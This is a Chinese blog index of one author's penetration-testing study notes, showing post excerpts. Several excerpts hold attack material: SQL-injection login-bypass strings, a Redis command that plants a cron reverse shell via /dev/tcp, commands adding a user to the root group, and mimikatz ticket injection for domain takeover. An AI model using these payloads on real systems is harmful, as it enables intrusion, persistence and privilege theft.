morris_pass_A

摘要：很久以前注册的账号密码，什么也不知道，整理一下嗯，重新开始阅读全文

posted @ 2019-07-04 13:56 morris_pass_A 阅读(124) 评论(0) 推荐(0)

2019年7月15日

摘要： 0x01 验证是否存在CDN 方法1 很简单，使用各种多地 ping 的服务，查看对应 IP 地址是否唯一，如果不唯一多半是使用了CDN，多地 Ping 网站有： http://ping.chinaz.com/ http://ping.aizhan.com/ http://ce.cloud.360 阅读全文

posted @ 2019-07-15 16:57 morris_pass_A 阅读(1192) 评论(0) 推荐(0)

2019年7月4日

万能密码

摘要： asp aspx万能密码1："or "a"="a2：'.).or.('.a.'='.a 3：or 1=1--4：'or 1=1--5：a'or' 1=1--6："or 1=1--7：'or.'a.'='a8："or"="a'='a9：'or''='10：'or'='or'admin'or 1=1#P 阅读全文

posted @ 2019-07-04 21:22 morris_pass_A 阅读(20825) 评论(0) 推荐(0)

常用端口号

摘要：常用端口号：代理服务器常用以下端口：（1）. HTTP协议代理服务器常用端口号：80/8080/3128/8081/9080（2）. SOCKS代理协议服务器常用端口号：1080（3）. FTP（文件传输）协议代理服务器常用端口号：21（4）. Telnet（远程登录）协议代理服务器常用端口：23 阅读全文

posted @ 2019-07-04 21:15 morris_pass_A 阅读(340) 评论(0) 推荐(0)

命令执行

摘要：阅读全文

posted @ 2019-07-04 20:49 morris_pass_A 阅读(182) 评论(0) 推荐(0)

php的序列化和反序列化

摘要：序列化__sleep的时候必要返回一个数组，一定返回对象的属性，否则报错，键值的key不重要，bbbbbbbbb根本不重要，主要是值是不是对象的属性的名字对上，也就是aa就不正确,a正确这里可以看见如果sleep里面返回的有对应属性的名字a那么后续的操作也就是$de->a='123';，最后序列化阅读全文

posted @ 2019-07-04 20:47 morris_pass_A 阅读(208) 评论(0) 推荐(0)

中间件和容器

摘要： web服务器只是提供静态网页解析（如apache），或者提供跳转的这么一种服务。而web中间件或者叫做应用服务器（其包含web容器）可以解析动态语言，比如tomcat可以解析jsp（因为tomcat含有jsp容器），当然它也可以解析静态资源，因此它既是web中间件也是web服务器。不过tomcat解阅读全文

posted @ 2019-07-04 19:07 morris_pass_A 阅读(1539) 评论(0) 推荐(0)

redis的小笔记

摘要： ./redis-cli -h 192.168.11.125 -p 58023 set x "\n\n\n*/1 * * * * bash-i &> /dev/tcp/192.168xx/xxx ) 0>&1 \n\n\n" config set dir /var/spool/cron config 阅读全文

posted @ 2019-07-04 19:04 morris_pass_A 阅读(144) 评论(0) 推荐(0)

修改用户密码，权限

摘要： useradd ceshi #添加用户 usermod -g root ceshi #添加用户到用户组非交互式更改密码 echo doiido:123456 | chpasswd echo '123456'| passwd --stdin doiido 更改权限第一个ALL是指网络中的主机第二阅读全文

posted @ 2019-07-04 19:01 morris_pass_A 阅读(340) 评论(0) 推荐(0)

域渗透

摘要：当遇到域环境，获取到一个域成员账号后，如果域控制器未打好补丁，则可以利用本文所提到的漏洞，快速获取到域控制器权限。 mimikatz也是可以看见sid的 3. 票据注入使用mimikatz将票据注入到当前内存中，伪造凭证，如果成功则拥有域管理权限，可任意访问域中所有机器阅读全文

posted @ 2019-07-04 18:44 morris_pass_A 阅读(214) 评论(0) 推荐(0)

跨域

摘要：常用的几种跨域处理方法： 1、JSONP 2、CORS策略 3、document.domain+iframe的设置 4、HTML5的postMessage 5、使用window.name来进行跨域 JSONP是通过src属性来跨域，动态添加一个<script>标签来实现。 CORS "跨域资源共享" 阅读全文

posted @ 2019-07-04 18:34 morris_pass_A 阅读(103) 评论(0) 推荐(0)

公告